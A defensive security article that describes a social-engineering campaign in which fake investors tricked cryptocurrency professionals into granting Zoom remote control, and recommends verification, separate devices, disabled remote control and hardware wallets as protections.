Protecting Your Crypto Assets From Social Engineering and Remote Access Attacks

Cryptocurrency traders and investors face an evolving threat landscape where sophisticated social engineering campaigns are combining with legitimate collaboration tools to compromise even security-conscious users. Recent incidents involving North Korean threat actors exploiting Zoom’s remote control feature demonstrate that the cryptocurrency industry must fundamentally reassess how it approaches operational security in an era of remote work and virtual meetings.

The Threat Landscape

In April 2025, cybersecurity researchers from the Security Alliance (SEAL) and Trail of Bits documented a campaign tracked as “Elusive Comet” in which North Korean hackers posed as venture capital investors and media producers to target cryptocurrency professionals. The campaign resulted in millions of dollars in losses and employed approximately thirty sock-puppet social media accounts alongside sophisticated corporate impersonation websites.

The attackers created a fictitious entity called Aureon Capital, complete with professional branding and online presence, to establish credibility with potential victims. They initiated contact through standard public relations pitches or direct messages inviting targets to appear on cryptocurrency podcasts. Once a victim expressed interest, the attackers scheduled Zoom calls, often withholding meeting details until the last minute to create urgency and reduce the target’s ability to verify the invitation.

During the calls, victims were prompted to share their screens to present their work. At that point, the attackers requested remote control access through Zoom’s built-in feature. By changing their display name to “Zoom,” the attackers made the permission dialog appear as a routine system notification rather than a request from another meeting participant. A single hasty click granted the attackers full mouse and keyboard access to the victim’s computer.

Core Principles

Defending against these attacks requires a multi-layered approach built on three core principles: verification, segregation, and minimal privilege.

Verification means independently confirming the identity of anyone requesting a meeting or collaboration. This includes verifying email domains, checking LinkedIn profiles for consistency, and cross-referencing claimed affiliations with official company directories. Trail of Bits identified the attack when supposed Bloomberg producers used consumer-grade Zoom accounts rather than Bloomberg’s enterprise tenant—precisely the kind of discrepancy that verification processes can catch.

Segregation involves maintaining separate environments for different activities. Cryptocurrency wallet operations should never occur on the same device used for general communications, meetings, and web browsing. A dedicated, air-gapped machine or hardware wallet should handle all significant transactions.

Minimal privilege means configuring your systems to grant the least access necessary for any given task. Zoom’s remote control feature should be disabled at the account level for users who do not need it, and clipboard sharing should be turned off to prevent attackers from accessing sensitive data.

Tooling and Setup

Implementing robust protection starts with your collaboration platform configuration. Zoom administrators can disable remote control at the account, group, or user level, and can lock the setting to prevent users from re-enabling it. The clipboard sharing option that attackers exploit to access private keys and seed phrases should be removed entirely.

Beyond Zoom settings, cryptocurrency professionals should deploy endpoint detection and response solutions that monitor for unusual process execution during video calls. Hardware security keys for two-factor authentication provide an additional layer of protection against credential theft, even if an attacker gains remote access to a workstation.

For wallet management, hardware wallets like Ledger or Trezor keep private keys isolated from the computer entirely. Even if an attacker gains full remote control, they cannot access keys stored on a hardware wallet without physical possession of the device and its PIN.

Browser extensions that manage cryptocurrency wallets should be installed in a separate browser profile used exclusively for blockchain interactions. This prevents malicious actors from accessing wallet extensions through a general-purpose browser session.

Ongoing Vigilance

The Elusive Comet campaign demonstrates that these threats are not theoretical—they are actively exploiting real cryptocurrency users and causing significant financial losses. The threat actors behind this campaign continue to operate, refining their techniques and targeting new victims.

Security awareness training should cover the specific tactics used in these campaigns: unsolicited meeting invitations, requests for screen sharing, pressure to act quickly, and unexpected prompts for remote access. Team members should feel empowered to decline suspicious requests without fear of missing professional opportunities.

Regular security audits of communication and collaboration tools ensure that new features or configuration changes do not introduce vulnerabilities. The cryptocurrency industry’s high-value targets make it a persistent focus for nation-state actors and organized criminal groups.

Final Takeaway

The convergence of social engineering with legitimate collaboration tools represents a fundamental shift in how cryptocurrency theft occurs. The tools built for productivity and teamwork are being weaponized against the very people who rely on them. Protecting your assets requires treating every digital interaction with the same caution you would apply to physical security—verify identities, segregate sensitive operations, and maintain strict access controls. In an industry where a single compromised click can cost millions, operational security is not optional—it is essential.

Disclaimer: This article is for educational purposes only and does not constitute professional security advice. Consult with cybersecurity experts for comprehensive protection strategies.